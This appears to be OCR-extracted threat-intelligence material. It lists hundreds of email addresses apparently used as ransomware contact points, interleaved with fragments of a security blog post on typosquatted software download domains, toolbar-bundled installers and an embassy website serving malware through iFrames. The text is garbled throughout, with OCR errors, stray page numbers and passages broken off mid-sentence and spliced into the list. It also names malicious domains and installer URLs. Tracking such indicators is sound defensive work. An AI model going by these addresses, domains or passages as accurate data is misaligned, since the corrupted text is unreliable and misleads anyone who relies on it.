u201c81r302dsj801@aol.com 
u201cr1731gf37@gmail.com 
ngrounded2019MEMZ@cock.li 
nbankinter.promo@protonmail.com 
n22eb687475f2c5ca30b@protonmail.com 
nmallox.israel@mailfence.com 
nmallox@tutanota.com 


nAllenPool1967@onionmail.org 
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nDerekwillson19878@protonmail.com 
nJeremysaylor1987@tutanota.com 
crastards@rediffmail.com 
smenov@mail2tor.com 
nDecryptMyData@mailfence.com 
nDecrypter@msgsafe.io 
nJordanKelly@onionmail.org 
ntommyshanahan@tutanota.com 
nrichardwafflespencer1982@protonmail.com 
ndatarestorehelp@firemail.cc 
ndatahelp@iran.ir 
tadamfox69@criptext.com 
nAdamfox69@criptext.com 
nAdamfox69@aol.com 
nAdamfox69@tutanota.com 
nDeus69@protonmail.com 
nDeus69@tutanota.com 
nClaudiaBarnengham@protonmail.com 
nmediatorforyou@mail.fr 
nragnarOk@tutanota.com 
nragnarok _recover@secmail.pro 
nr19narOk@airmail.cc 
nrehab-file@seznam.cz 
nTomGate33@criptext.com 
nlomGate33@yahoo.com 
ntlomGate33@tutanota.com 
nmending7788@protonmail.ch 
nBenford333@criptext.com 
nBenford333@protonmail.com 
nBenford333@tutanota.com 
nkinddoctor@airmail.cc 
nRestorFile@tutanota.com 
nRestoreFile@protonmail.com 
nRestoreFile@qq.com 
n55billy777@mail.fr 
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nniggchiphoterl974@protonmail.com 
nCitrteam@yahoo.com 
nCitrteam@tutanota.com 
nCitrteam@gmail.com 
EnceryptedFiles@tutanota.com 
nEnceryptedFiles@tutanota.com 
ReturnEncerypted@tutanota.com 
nrublytrojan@gmail.com 
zaton@tuta.io 
ziggyransomware@secmail.pro 
falcon360@cock.li 
opengates@india.com 
decryptme.files@mail.ru 
europol.eurofuck@yandex.com 
super.decryptme2016@yandex.com 
efwerez2015@yandex.com 
TheNorthPolean@protonmail.com 
509@protonmail.com 
googleprotect@mail.ru 


mohammad@opensourcemail.org 


CONTACT _US _pabluklOcker638yzhgr@2tor.com 


rakolo23@gmail.com 
fogwls245@naver.com 
powerhacker03@hotmail.com 
coder007@protonmail.com 
redteam@yolosecfamework.com 
onlineservices1@usa.com 
tncybersquard@torbox3uiot6wchz.onion 
entry122717@gmail.com 
entry123488@india.com 
information@jupimail.com 
bmps@tutanota.com 
bmps@protonmail.com 
avuqywyhydoz1989@o2.pl 
xlsx@tutanota.com 
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mikrotik@tutamail.com 
paydear@aol.com 
rootcopper@aol.com 
rootcopper@tutanota.com 
rootcopper@protonmail.com 
nordfox@tutanota.com 
nordfox@protonmail.com 
nordfox@aol.com 
foxnitro@tutanota.com 
foxnitro@aol.com 
foxnitro@protonmail.com 

ex _parvis@aol.com 

ex _parvis@tutanota.com 

ex _parvis@protonmail.com 

Ad _finem@tutanota.com 
adfinem001@cock.li 

Ad _finem001@protonmail.com 
pacman.support@protonmail.com 
2200287831@qq.com 
onionhelo@memeware.net 
BM-2cWdhn4f5UyMvruDBGs5bK7 7NsCFALMJkR@bitmessage.ch 
shortmangnet@420blaze. it 
BM-2cUEKUQXNffBg89VwtZi4twYiMomAFzy60@bitmessage.ch 
nikolatesla@cock.|i 
slavic@secmail.pro 
aversia@tuta.io 
payday@cryptmaster.info 
payday@cock.lu 
Checkzip@india.com 
lockers@tutamail.com 
car1333as@gmail.com 
helperO05@cock.|i 
chukabra@tuta.io 
ghOstcrypt@tuta.io 
whitedevil@tutanota.de 

20878 


paydayz@cock.li 
kekin@cock.li 
arkana@tuta.io 
shadowzone@cock.li 
shadowzone@india.com 
isso32@tutanota.com 
erwind@tuta.io 
oddy@tuta.io 


BM-2cTVHx6b7RYhJ9gGKZn6yTUBpBBq3LHRkz@bitmessage.ch 


jeffreyclinton1977@onionmail.org 
jackiesmith176@protonmail.com 
alabacoman@tutanota.com 
alberttconner2021@protonmail.com 
AndryCooper1988@tutanota.com 
CharlesSLewis1987@onionmail.org 
DavidSchmidt1977@protonmail.com 
DorothyFBrennan1992@tutanota.com 
dwaynehogan33@onionmail.org 
ElizabethAntone1961@protonmail.com 
EndryuRidus@tutanota.com 
fionahammers1995@onionmail.org 
JamesHoopkins1988@onionmail.org 
jasonchow30@onionmail.org 
JerseySmith1986@onionmail.org 
Kirklord1967@tutanota.com 
leonardred1989@protonmail.com 
Leslydown1988@tutanota.com 
leticiaparkinson1983@onionmail.org 
MarkHuntigton1977@tutanota.com 
Mikedillov1986@onionmail.org 
noreywaterson1988@protonmail.com 
ollivergreen1977@protonmail.com 
richardbrunson1892@protonmail.com 
rickysmithson1975@protonmail.com 


VinceGilbert@tutanota.com 


20879 


Davidschmidtl977@protonmail.com 
IndiAdams@onionmail.org 
jimmyhendricks@tutanota.com 
karlironsterson122@protonmail.com 
nohopeproject@protonmail.com 
2ndsupport@protonmail.com 
kod.zapuska@tuta.io 
cryptozlo@cock.li 
varginfo@tuta.io 
mail@gryphon.bz 
nuclear@cryptmaster.info 
addict@yahoo.com 
crypter@cyberservices.com 
fmhir@protonmail.com 
mdk4y@protonmail.com 
dmo904zB@protonmail.com 
7V1c3j1W4j@protonmail.com 
GodSaveMe@tutamail.com 
GodSaveYou@tuta.io 
decservice@mail.ru 
recoverydbservice@protonmail.com 
prOt3eam@protonmail.com 
decryptgaranty@airmail.cc 
secureserver@memeware.net 
odinl9@protonmail.com 
cammoral19@protonmail.com 
metan19@mail2tor.com 
spyhunter5s@aol.com 
tater@mail2tor.com 
azor2020@protonmail.ch 
azor2020@jxmpp.jp 
razor2020@protonmail.ch 
razor2020@jxmpp.jp 
cyrill.fedorOv@yandex.com 
kathi.bell.1997@outlook.com 
20880 


ann4.orlova.89@yandex.com 
antony.hops.4ever@outlook.com 
artur_ivanov _19991103@mail.ru 
diana.portnova.01.11.1987@mail.ru 
indrik@tuta.io 

indrik@airmail.cc 
retmydata@protonmail.com 
pay.ransom@protonmail.com 
servicep073@gmail.com 
vuleston@gmx.com 
mifoudz19@gmail.com 
HackerBalochO7@gmail.com 
Shadows _Brokers@protonmail.com 
oneluno243@yandex.com 
ki08ng7772@yandex.com 
cryptolocker51@sigaint.org 
HolyCrypt@aol.com 
imugf@outlook.com 
this.email.address@gmail.com 
this.email.address@qmail.com 
get.back.3355@gmail.com 
danielthail01514@gmail.com 
friendly.cyber.criminal@gmail.com 
troll22118@gmail.com 
exploitvenus@gmail.com 
criminal.ransomware.descripton@protonmail.ch 
JEBACDISA@jeszczeniegotowy.com 
vowdom@mailpoof.com 

iam _watching 55@protonmail.com 
theonly _elchapo@protonmail.com 
vnhack@protonmail.com 
jebacbydgoszcz666@mail.ru 
surpakings@mail.ee 
sarah.barrick@protonmail.com 


linda.hartley@tutanota.com 
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mary.weston@protonmail.com 
beryl.mclennan@tutanota.de 
Shirley.Rourke@protonmail.com 
Imran.Adil@tutanota.com 
florri.nord@protonmail.ch 
deadhacksteam@gmail.com 
paymemen@gmail.com 
india2lock@gmail.com 
hghtllfh77137@gmail.com 
vpsimf@gmail.com 
helpforyoupc@tutanota.com 
squadhack@email.tg 

recovery _server@protonmail.com 
recoverylserver@cock.|i 
buransupport@exploit.im 
buransupport@xmpp.jp 
jacksteam2018@protonmail.com 
notesteam2018@tutanota.com 
e95c12d08b14@protonmail.com 
e95c12d08b14@airmail.cc 
endereless@cock.li 
happyless@airmail.cc 
dcr@cumallover.me 
surpriseN1@aol.com 
surpriseN1@protonmail.com 
rizonlocker@airmail.cc 
rizonlocker@firemail.cc 
johnsmith654@cock.li 
johnsmith456@cock.li 
sanio.marino@aol.com 
lewismccown@yahoo.com 
bullockcraig@aol.com 
bavaria54@protonmail.com 
nic.shulz@protonmail.com 


established01@protonmail.com 
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emulegratis .es 
messenger-plus-co .com 
zone-alarm-co .com 
directx-co .com 
bittorrent-co .com 
media-player-co .com 
emulefree .com 

divx-co .com 

office-co .com 
virtualdj-co .com 
zattoo-co .com 
clonecd-co .com 
tuneup-co.com 
Iphant-co.com 
explorer-co.com 
amule-co .com 
messenger75-co .com 
limewire-comp .com 
lite-codec-co .com 
power-dvd-co .com 
messenger-plus-live-co .com 
reamweaver-co .com 
aresgratis .net 

vuze-co .com 
emuleespana .es 
regcleaner-co .com 
paint-net-co .com 
download-acelerator .com 
windownloadweb .com 
xp-codecpack-co .com 


The AdWords campaigns are spread across different local Google sites, and are target- 
ing a particular local demographic only. Moreover, if the end user isn’t coming from a 
sponsored ad, the download link on each and every of the participating sites is linking to 
the official site of the brandjacked software, and if he’s coming from where he’s supposed 
to be coming the software bundle including the revenue-generating toolbar is served in the 
following way : 


firefox-co .com/downloads/installer-5-firefox-uk.exe 

winamp-co .com/downloads/installer-37-winamp-uk.exe 
winamp-co .com/downloads/installer-37-winamp-nl.exe 
zone-alarm-co .com/downloads/installer-18-zonealarm-nl.exe 
servicepack-co .com/downloads/installer-14-service-pack-3-uk.exe 
divx-co .com/downloads/installer-25-divx-uk.exe 


Upon installation the toolbar generates revenue for the campaigner, and given the fact 
that a single DIY toolbar can be associated with a single rewards account, the campaigner is 
also maintaining a modest portfolio of toolbars. For instance : 
peer2peerne.media-toolbar.com - UserID=UN20090120111936062 
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established@cock.|i 

epicday@cock.li 

epicday@airmail.cc 

recowery 1servers@cock.li 
encrypter@tuta.io 
jaber1699@protonmail.com 
bronmerberpal976@protonmail.com 
setimichas1971@protonmail.com 
setimichas1971@torbox3uiot6wchz.onion 
reycarnasil983@protonmail.com 
reycarnasil983 @torbox3uiot6wchz.onion 
ssananunak1987@protonmail.com 
ssananunak1987 @torbox3uiot6wchz.onion 
passoamomal1983@protonmail.com 
passoamoma@keemail.me 


cloctabernsand1989@protonmail.com 


cloctabernsand1989@torbox3uiot6wchz.onion 


artilkilinl1984@protonmail.com 
artilkilin@tuta.io 
loggitore1984@protonmail.com 
loggitore1984@cock.|i 
loggitorel1984@mailchuck.com 
loggitore1984@tuta.io 
lousimzacil19@protonmail.com 
lousimzacil9@tutanota.com 
TheWhiteRose@Torbox3uiot6wchz.onion 
ormazd _ahura@aol.com 
maoloa@india.com 
maoloa@yahoo.com 
informerdecrypted@aol.com 
brydreed@india.com 
hina.helper@aol.com 
hina.helper@india.com 
China.Helper@india.com 


tabufa@protonmail.com 


20883 


tabufa@airmail.cc 
systems32x@gmail.com 
systems32x@yahoo.com 
systems32x@tutanota.com 
help32xme@usa.com 
additional.mail@mail.com 
epta.mcold@yahoo.com 
epta.mcold@aol.com 
middleman2020@protonmail.com 
middleman2020@tutanota.com 
Decryptcn@protonmail.ch 
shelbyboom@protonmail.com 
shelbyboom@cock.|i 
diller13@protonmail.com 

dillerl13@cock.li 
decrypt019@protonmail.com 
decrypt2019@outlook.com 
systems32@gmail.com 
opticodbestbad@aol.com 
opticodbestbad@mail.ee 
59869420@tutanota.com 
normanzak@protonmail.com 
normanzak@airmail.cc 
supportdoc@protonmail.ch 
ransom@deliveryman.com 
nkittybuggy8648@gmail.com 
LockMecQqL3Ruyi7VORfZ@tutamail.com 
LockMe9hG1F7pbWqThUt9P8@mailfence.com 
LockMecQqL3Ruy7VORfZ@protonmail.com 
frozen service security@scryptmail.com 
Payment _Confirmation@scryptmail.com 
Email Decryptor Payment@scryptmail.com 
repair data@scryptmail.com 
FSA2018@scryptmail.com 

restore service@scryptmail.com 

20884 


ineedmoney12@tutanota.com 
15fd9ngtetwjtdc@yopmail.com 
obliviondecrypt@cock.li 
obliviondecrypt@protonmail.com 
sequre@tuta.io 
xzer@tutanota.com 
zizz@tutanota.de 
redbul@tutanota.com 
avira@keemail.me 
starbax@tutanota.de 
berr@keemail.me 
excaliburarthur@protonmail.com 
symbyosis@protonmail.com 
TaiLung@protonmail.com 
lelouchlamperouge@keemail.me 
teresa@tutanota.de 
reter@keemail.me 


gores@keemail.me 


lelouchlamperouge@tutanota.com 


MonkeyD.Luffy@keemail.me 


Suzumiya _Haruhi@tutanota.com 


Vash the Stampede@keemail.me 


kares@keemail.me 
kares@tuta.io 
latry@tutanota.com 
laraty@keemail.me 
leviakkerman@tuta.io 
tatycom@tutanota.com 
kytahara@tutanota.com 
volfard@tutanota.com 
dalneken@tutanota.de 
dorges@keemail.me 
falco.grice@yandex.ru 
flockforster@tutanota.de 


bertholdhoover@mail.ru 


20885 


BM-2cVQmNzy6ZLBWCD4fVYWsccBSAik2jEUuy@bitmessage.ch 
dsupport@airmail.cc 
xxxSupport@protonmail.com 
badguyconsult@protonmail.com 
sqlsolutions@protonmail.com 
solutionscenter@protonmail.com 
sealocker@daum.net 
winrar@protonmail.com 
si4im@protonmail.com 
VenusLocker@mail2tor.com 
crazyman@keemail.me 
recovery@mail15.com 
pcsolutions@mail.ru 
windows.reparation@mail.ru 

restore 2019@mail.ru 
dataforward@bk.ru 
6699nm@protonmail.com 
zerounix32@gmail.com 
zerounix48@gmail.com 
black.block@qq.com 
darkwaiderr@cock.li 
contact@contipauper.com 
hackcwandgproton@mail.com 
hackcwand@protonmail.com 
gkticSa@protonmail.com 
kleomicro@gmail.com 
kleomicro@dicksinhisan.us 
landolforizzo2@gmail.com 
landolforizzo2 @tfwno.gf 
seonunlock@protonmail.com 
seonunlock@naver.com 
trOning@protonmail.com 
TECHANDSTRATSupport@secmail.pro 
TECHANDSTRATsuport@protonmail.com 
TECHANDSTRATSuport@protonmail.co 
20886 


James.Roach.10@gmail.com 
hakbit@protonmail.com 
servo99@protonmail.com 
servo33@protonmail.com 
recoba90@protonmail.com 
timepay@protonmail.com 
mheist5@protonmail.com 
llu1t1@secmail.pro 
josephnull@secmail.pro 
suppforunl@firemail.com 
suppforunl@xmpp.jp 
workplus111@protonmail.com 
worker400@airmail.cc 
filesrestore0O00@airmail.cc 
decoder44@rambler.ru 
alpinbovuar@protonmail.com 
kingkong2@tuta.io 
1bmx1@tuta.io 

black _privat@tuta.io 
darkseid@tutamail.com 
John2wick@tuta.io 

black _private@tuta.io 
Tiberiano@aol.com 
irrelevantly@aliyun.com 
willettamoffat@yahoo.com 
kingstonbtc@tutanota.com 
pandabit@tuta.io 
Jeremy.albright@criptext.com 
online@tuta.io 
cyber@outlookpro.net 
steriok12132@tutanota.com 
kukajamba@tutanota.com 
bugagaga@tuta.io 
bloody7@tuta.io 


secure820@msgsafe.io 


20887 


requests2@memeware.net 
request2@memeware.net 
sepas@protonmail.com 
sepast@protonmail.com 
server-Ssupport@india.com 
deyscriptors1@india.com 
x3m-pro@protonmail.com 
x3m@usa.com 
contact-support@elude.in 
contactsupport@cock.li 
opentoyou@india.com 

Lost Files Ransom@secmail.pro 
safe@safeplacesllc.com 
sxvcsacobyzurlock@protonmail.com 
upeditco@gmail.com 

hello company@protonmail.com 
rihofoj@mailinator.com 
TheTrumpLocker@mail2tor.com 
TrumpLocker@mail2tor.com 
damage@india.com 
partially@aaathats3as.com 
nitas811@protonmail.com 
niduz59@protonmail.com 
pay2key@tuta.io 
pay2key@pm.me 
file987@sigaint.org 
file9876@openmail.cc 
file987@tutanota.com 
mrrobotm@yandex.ru 
payforsecurity _1@protonmail.com 
helpdesk nemty@aol.com 
csirt@tesorion.nl 
youngthug412@protonmail.com 
hparrockneverstop@protonmail.com 


4shadow@protonmail.com 
20888 


FileFixer@ProtonMail.com 
JustBTC@elude.in 
MyFiles1@ProtonMail.com 
JustBTC@ProtonMail.com 
sales@onserve.ca 
fappism@opentrash.com 
support@reimageplus.com 
zyrkal@airmail.cc 
maddogteam@airmail.cc 
conactme@fake-box.com 
contact.body.alhoha@gmail.com 
bhidhizatta@protonmail.com 
icleanupthemess@tutanota.com 
icleanupthemess@yandex.com 
andorial3@yandex.com 
twentyonedecember@cock.li 


twentyonedecember@firemail.cc 


underthedomeandoria@secmail.pro 


truemessiah13@criptext.com 
kingTrumpissave@mai.ru 
corona396@techmail.info 
corona66@outlookpro.net 
samishere@fake-box.com 
kingsam83@mail2tor.com 
Figskici@tutanota.com 
darksimo@protonmail.com 
ama53940400@gmail.com 
zeoticus@tutanota.com 
zeoticus@aol.com 
zeoticus@protonmail.com 
immunityyoung@aol.com 
immunityyoung@tutanotal.com 
immunityyoung@protonmail.com 
immunityyoung@tutanota.com 


anobtanium@tutanota.com 
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erica2020@protonmail.com 
erica _files@protonmail.com 
erica _affiliate@protonmail.com 
emsisoft cve@protonmail.com 
5844869519@protonmail.com 
6310812891 @protonmail.com 
6152412247@protonmail.com 
1494040670@protonmail.com 
5993509759@protonmail.com 
4896949806@protonmail.com 
8438769274@protonmail.com 
6425934071 @protonmail.com 
2880069676@protonmail.com 
2251980267@protonmail.com 
abchelper@sigaint.org 
nazm.fatma@yandex.com 
muhasebe@komposan.com 
abc@xyz.com 

acc@xyz.com 
hackerz6924@tutanota.com 
xiaoba 666@163.com 
un92@protonmail.com 
zariqa@protonmail.com 
firmabilgileri@bk.ru 
fbi-cybercrimedivision@hotmail.com 
dd.coala@protonmail.com 
prOtector@india.com 
prOtector@tutanota.com 
filefrozr@protonmail.com 
nemesis _decryptor@aol.com 
juccy@protonmail.ch 
BM-2cxrw462ayqkxXPangQ4jxbuq2uZjYTZH37@bitmessage.ch 
-isabelal956@aprotonmail.ch 
isabelal956@aprotonmail.ch 
-sofia _lobster@protonmail.ch 
20890 


sofia _lobster@protonmail.ch 
helpmegetfiles@protonmail.ch 
GFofsdfsf4545sd@bigmir.net 
decryptiomega@protonmail.com 
decryptiega@protonmail.com 
iomega@firemail.cc 
kosecurity@airmail.cc 
canyouseemel@yandex.ru 
Wulfric@gmx.com 
manager@outlookpro.net 
contact365@mail2tor.com 
pokemongo@mail2tor.com 
corporacaoxrat@protonmail.com 
powerbase@tutanota.com 
deyscriptors24@india.com 
viewclear@yandex.com 
mia.kokers@aol.com 
goodsupport@india.com 
siri-down@india.com 
kuprin@india.com 
serverL@mailfence.com 
decrypr _helper@india.com 
badadmin@india.com 
data97@india.com 
support7@cock.li 
Support56@cock.li 
decrypt014@cock.li 
locker87@cock.|i 
Scarab@horsefucker.org 
ibm15@horsefucker.org 
diven@cock.li 
xvalera228@protonmail.com 
thermal@lock.li 
thermal@cock.li 


alices@mail2tor.com 
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alices@cock.|i 
bin420@cock.|i 
secure32@cock.li 
test757@tuta.io 
test757@protonmail.com 
test757xz@yandex.com 
test757xy@yandex.com 
test757@consultant.com 
m4zn0v@keemail.me 
m4rkOv@tutanota.de 
epgorgpl@gmsil.com 

datas back help112@tutanota.com 
bsbasim2017@gmail.com 
programmingmyst@gmail.com 
swagkarna@gmail.com 
hackrefisher@gmail.com 
pagar40br@gmail.com 
banetnatia@mail.com 
Kharpov _igor@mail.com 
matusik11@techemail.com 
megrela777@gmail.com 
rayankirr@gmail.com 
ryanqw31@gmail.com 

Sarah G@ausi.com 
towerweb@yandex.com 
kratosdimetrici@gmail.com 
recoveryhelp@bk.ru 
mpritsken@priest.com 
kozy.jozy@yahoo.com 
dr.jimbo@bk.ru 
cryptoshocker@tutanota.com 
redtablet9643@yahoo.com 
thematrixhasyou9643@yahoo.com 
noliberty9643@yahoo.com 
bluetablet9643@yahoo.com 
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peer2peeren.media-toolbar.com - UserID =598F9353-BD10-47B9-8B40-29B33AD7A3E4 


The bottom line is that despite the fact that the campaigner is acquiring lots of traffic 
through the brandjacking, and is definitely breaking even based on the number of toolbars 
installed, he’s failing to monetize the fraud scheme, at least for the time being. 


UPDATE: Hai Habot’s comments - "The information you have provided will help us track 
the publisher and | will personally see that our compliance team looks into it ASAP. 


As you may know, Conduit does not have full control over the promotional activity of 
the publisher (i.e. his fraudulent use of Google AdWords or any other usage of third party ads 
or links) however, the activity described in your post is clearly in violation of our terms of use 
(section V of the Conduit Publisher Agreement) and our compliance team can take different 
measures against this publisher including the removal of the toolbar from our platform. 


The Conduit Rewards program is not a standard affiliate network. It offers incentives to 
publishers based on their toolbar’s long term performance. | didn’t look into the stats of this 
specific publisher yet but | can assure you that such spam traffic would generate very little (if 
any) rewards. In any case - we will make sure that the rewards account of this publisher will 
be disabled until this compliance issue is resolved." 


1. http: //blogs.zdnet .com/security/?p=240 
2. http: //www.conduit.com/ 


5.1.10 Embassy of India in Spain Serving Malware (2009-01-27 11:31) 
& 13 304 HTTP wwia.embajadaindi.,. — fimaqenes/FondoMenu. gif 0 


& 14 304 HTTP www embajadaindi... findexENG. html 0 


adaindi... —_fimaqenes/FondoMenu2. aif 0 


adaindi... /Templates/slideshows. js 0 
adaindi... fembajada.css 0 
adaindi... {OLDindexENG_filesfindep... 0 
adaindi.., O1.jpg 


findiagalle 
alytics.net count. phy 
/count.ph 27 text/html; c... 
; fcount,ph 5 text/html 
pinoc.org = fcount.ph 512 text/html 
2.jpa 0 
304 HTTP www embajadaindi... _findiagallery/03.jpq 0 


www embajadaindi... _ findiagallery/0 


The very latest addition to the "embassies serving malware" series is the Indian Embassy in 
Spain/Embajada de la India en Espana (embajadaindia.com) [1]which is currently iFrame-ED - 
original infection seems to have taken place two weeks ago - with three well known malicious 
domains. 


Interestingly, the malicious attackers centralized the campaign by parking the three iFrames 
at the same IP, and since no efforts are put into diversifying the hosting locations, two of 
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bluetablet9643@yandex.ru 
decodedecode@yandex.ru 
decodedecode@tutanota.com 
restoreassistant@yandex.com 
restoreassistanl2@tutanota.com 
pyongyangooi@yahoo.com 
bl4ckdr4gon@tutanota.com 
relock001@tuta.io 
relock001@yahoo.com 
datsun987 @tutanota.com 
datsun987@yahoo.com 
Linersmik@naver.com 
Jinnyg@tutanota.com 
Loder903@yahoo.com 
files4463@tuta.io 
files4463@protonmail.ch 
files4463@gmail.com 
Yourencrypt@tutanota.com 
Yourencrypt@gmail.com 
Yorencrypt@protonmail.com 
RestoreFile@iprotonmail.com 
oken@tutanota.com 
oken5@naver.com 
oken80@yahoo.com 
RestoreFile@yahoo.com 
RestoreFile2018@gmail.com 
BatHelp@protonmail.com 
FoxHelp@cock.li 
FoxHelp@tutanota.com 
newrar@tuta.io 
newrar@cock.lu 
FastBob@protonmail.com 
KOKO8@protonmail.com 
KOKO8@qq.com 
itcompany2018@qq.com 
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EncodeMan@qq.com 
tru8@protonmail.com 
tru8@tutanota.com 
GMan222@qq.com 
ransomriggs@qq.com 
nobad@tutamail.com 
InkcognitoMan@tutamail.com 
FilesBack@qq.com 
GetMyPass@qq.com 
InkognitoMan@firemail.cc 
RecoveryDatal@cock.li 
RecoveryDatal@cock.li 
RecoveryDatal@protonmail.com 
Jingju87@naver.com 
Loder903@gmail.com 
PedantBack@protonmail.com 
Gman222@protonmail.com 
BIGBOSS777@airmail.cc 
BIGBOSS777@tutamail.com 
SmartDen@protonmail.com 
CryptoPlant@protomnail.com 
PedantBack@tutanota.com 
PedantBack@india.com 
radrigoman@protonmail.com 
radrigoman@tutanota.com 
radrigoman@airmail.cc 
rescompany19@yahoo.com 
rescompany19@india.com 
rescompany19@cock.li 
maihoandcryp@qq.com 
maihoandcryp@protonmail.com 
maihoandcryp@yahoo.com 
Kromber@protonmail.com 
Kromber@india.com 
Quickhelp24@protonmail.com 
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Quickhelp24@tuta.io 
Quickhelp24@aol.com 
MyDataRestore@protonmail.com 
MyDataRestore@yahoo.com 
MyDataRestore@tutanota.com 
YourDataHere@protonmail.com 
YourDataHere@yahoo.com 
yourDatahere@tutanota.com 
deccrypasia@yahoo.com 
deccrypasia@protonmail.com 
deccrypasia@aol.com 
abat2019@yahoo.com 
abat2019@aol.com 
abat2019@cock.|i 


YourDataHere333@protonmail.com 


YourDataHere@firemail.cc 
SafeGman@tutanota.com 
SafeGmanefiremail.cc 
DataRescue@protonmail.com 
DataRescue@tutanota.com 
DataRescue@firemail.cc 
MarkTrue88@protonmail.com 
MarkTrue88@tutanota.com 
MarkTrue88@airmail.cc 
TomSoyer5@protonmail.com 
TomSoyer5@yahoo.com 
TomSoyer5@aol.com 
Buddy888@protonmail.com 
buddy888@tutanota.com 
billwong73@protonmail.com 
billwong73@aol.com 
FridaFarko@yahoo.com 
atomickule@cock.li 
SantaGman22@protonmail.com 


SantaGman22@tutanota.com 
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AlanGreen88@criptext.com 
AlanRed@criptext.com 
AlanRed88@protionmail.com 
AlanRed@tutanota.com 
JamesBaker78@criptext.com 
JamesBaker78@protonmail.com 
JamesBaker78@tutanota.com 
RobertEvan@criptext.com 
Mayth24@aol.com 
AdamBrown89@criptext.com 
Mayth24@protonmail.com 
Mayth24@tuta.io 
FridaFarko@protonmail.com 
FridaFarko@aol.com 
BatHelp@tutanota.com 
BatHelp@india.com 
BobGreen85@criptext.com 
BobGreen85@aol.com 
BobGreen85@tutanota.com 
John91Doe@yahoo.com 
Sidmouleux996@aol.com 
alexwind46@yahoo.com 
alexwind46@protonmail.com 
alexwind46@aol.com 
Marco88Polo@yahoo.com 
BobGant82@yahoo.com 
BobGant82@tutanota.com 
Conftcker-decryptor@mail.ru 
Skull.and.bones2017@protonmail.com 
blackgoldl23@protonmail.com 
synack@scryptmail.com 
synack@countermail.com 
tyughjvobn13@scryptmail.com 
bubkjdws@scryptmail.com 
sharkO2@techmail.info 
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shark003@protonmail.com 
HillaryTrump@protonmail.com 
James.cute@mail.com 
avos@thesecure. biz 
avos@mail2tor.com 
FlamingoRans@tutamail.com 
FlamingoRans@protonmail.com 
OwnerRansom@tutanota.com 
OwnerRansom@protonmail.com 
MrArturX@yandex.ru 
RansSupport@elude.in 
Lizardinfo@yandex.ru 
LizardSup@tutanota.com 
DeathSpicy@yandex.ru 
DeathSpicy@tutanota.com 
MrDecrypter@yandex.com 
MrD3crypter@tuta.io 
elixuwaril@gmail.com 
donuvnami@gmail.com 
Dude@mailfence.com 
italykarlmarx@gmail.com 
felsalentina@gmail.com 
BTCDecrypter@gmail.com 
BTCDecrypter@yandex.com 
gooodperson@yandex.ru 
gooodperson@mailingaddress.org 
supransomware2021@keemail.me 
suppransomware2021@yandex.com 
hydrarans@yandex.com 
hydraransomware@aol.com 
drweb.dec@tutanota.com 
leakthemall@protonmail.com 
montanarecover@aol.com 
montanarecover@cock.li 


hdietrich@gmail.com 
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fanlabomos1974@protonmail.com 
eranndicucl1978@protonmail.com 
guifullchartil970@protonmail.com 
phrasitliter1981@protonmail.com 
elsleepamlen1988@protonmail.com 
southbvilolor1973@protonmail.com 
carbedispgret1983@protonmail.com 
glocadboysun1978@protonmail.com 
maxgary777@protonmail.com 
ranosfinger@protonmail.com 
niggchiphoter1974@protonmail.com 
limistocon1980@protonmail.com 
pinkiwinki78@mail.ru 
pusheken91@bk.ru 
iaminfected.sac@elude.in 
xvfxgw3929@protonmail.com 
xvfxgw213@decoymail.com 
newpatek@cock.|i 
onmywrist@cock.li 
officialintuitsoftware@gmail.com 
massiveransomware@protonmail.com 
7211300@protonmail.com 
Video123.avi.horsia@airmail.cc 
Photo123.png.horsia@airmail.cc 
Document123.docx.horsia@airmail.cc 
saviours@airmail.cc 
bestdeal@firemail.cc 
filedecryption@protonmail.com 
mr.leen@protonmail.com 
BM-2cUPRnXJRuFYKcDUCLugjrCPY58nrvHrAV@bitmessage.ch 
contato@vkcode.ru 
dopomoga.rs@gmail.com 

data _cloud2012@aol.com 
RenameX12@cock.|i 


RenamexX12@tutanota.com 
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NamedFree2@protonmail.com 
CyberGod200@protonmail.com 
cryptopatronum@protonmail.com 
alphasup@mail.ee 
supalpha@cock.li 
betasup@mail.ee 
Betasup@cock.li 
juniorwanme@tutanota.com 
makop@airmail.cc 
makop@exploit.im 
makop@thesecure.biz 
carlosrestore2020@aol.com 
somalie555@tutanota.com 
luntik2316@protonmail.com 
luntik2316@tutanota.com 
troubleshooter@cock.li 
helpdesk _makp@protonmail.ch 


Veracry@protonmail.com 


data.compromised@protonmail.com 


cock89558@cock.|i 


markmontgomery2020@hotmail.com 


buydecryptor@cock.li 
xaodecrypt@protonmail.com 
xaodecrypt@airmail.cc 
calwaykitty@aol.com 
fargodrops@cock.li 
nOprOblems@protonmail.com 
verilerimialmakistiyorum@inbox.ru 
datewatchman@protonmail.com 
maknop@cock.|i 
fooox1@protonmail.com 
giantt1@protonmail.com 
akzhq12@cock.li 
KILLYOUASS@protonmail.com 


killyouass@horsefucker.org 
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payfordecoder@hotmail.com 
payforkey@protonmail.com 
restoring.data@protonmail.com 
compromised@airmail.cc 
makop@tuta.io 
makop@elude.in 
savedata2@protonmail.com 
savedata@cumallover.me 
makop@cock.li 
helpmakop@cock.li 
ruthlessencry@qq.com 
akzhq530@protonmail.com 
origami7 @firemail.cc 
prosoft@tutanota.com 
akzhq615@protonmail.com 
genfiles@protonmail.com 
keymaster@cock.li 
tomasrich2020@aol.com 
tomasrich2020@protonmail.com 
akzhq00705@protonmail.com 
Crypt@qbmail.biz 
paco@airmail.cc 
getdataback@qbmail.biz 
decryption@zimbabwe.su 
zimbabwe@msgsafe.io 
krymaster@mail.com 
datalost@foxmail.com 
encryptboys@tutanota.com 
johncastle@msgsafe.io 
JohnCastlelO00@protonmail.com 
myfiles@msgsafe.io 
votrefile@tuta.io 
paymantsystem@cock.|i 
akzhq808@cock.li 
akzhq808@tutanota.com 
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ranbarron88@qq.com 
Crypt@zimbabwe.su 
decryption.zimbabwe@protonmail.com 
decryptdocs@msgsafe.io 
decryptdocs@firemail.cc 
Genovo@protonmail.com 
akzhq915@tutanota.com 
akzhq915@protonmail.ch 
akzhq915@airmail.cc 
Wannadecryption@gmail.com 
davidcastle@msgsafe.io 
loyaldecrypt@privatemail.com 
johnlennoncr@hotmail.com 
dino _rans@protonmail.ch 
dino _rans@xmpp.jp 
poyasecurity@protonmail.com 
poyasecur@gmail.com 
manage.file@messagesafe.io 
morrith smith@tutanota.com 
filerecov3ry@keemail.me 
admcphel@protonmail.ch 
akzhq412@aol.com 
akzhq710@protonmail.com 
akzhq725@tutanota.com 
akzhq830@tutanota.com 
antiransomware@aol.com 
backup 499@protonmail.com 
checkfilelock@protonmail.ch 
cloudfiles@airmail.cc 
cloudfiles@msgsafe.io 
davidrecovery@protonmail.com 
farik1@protonmail.com 
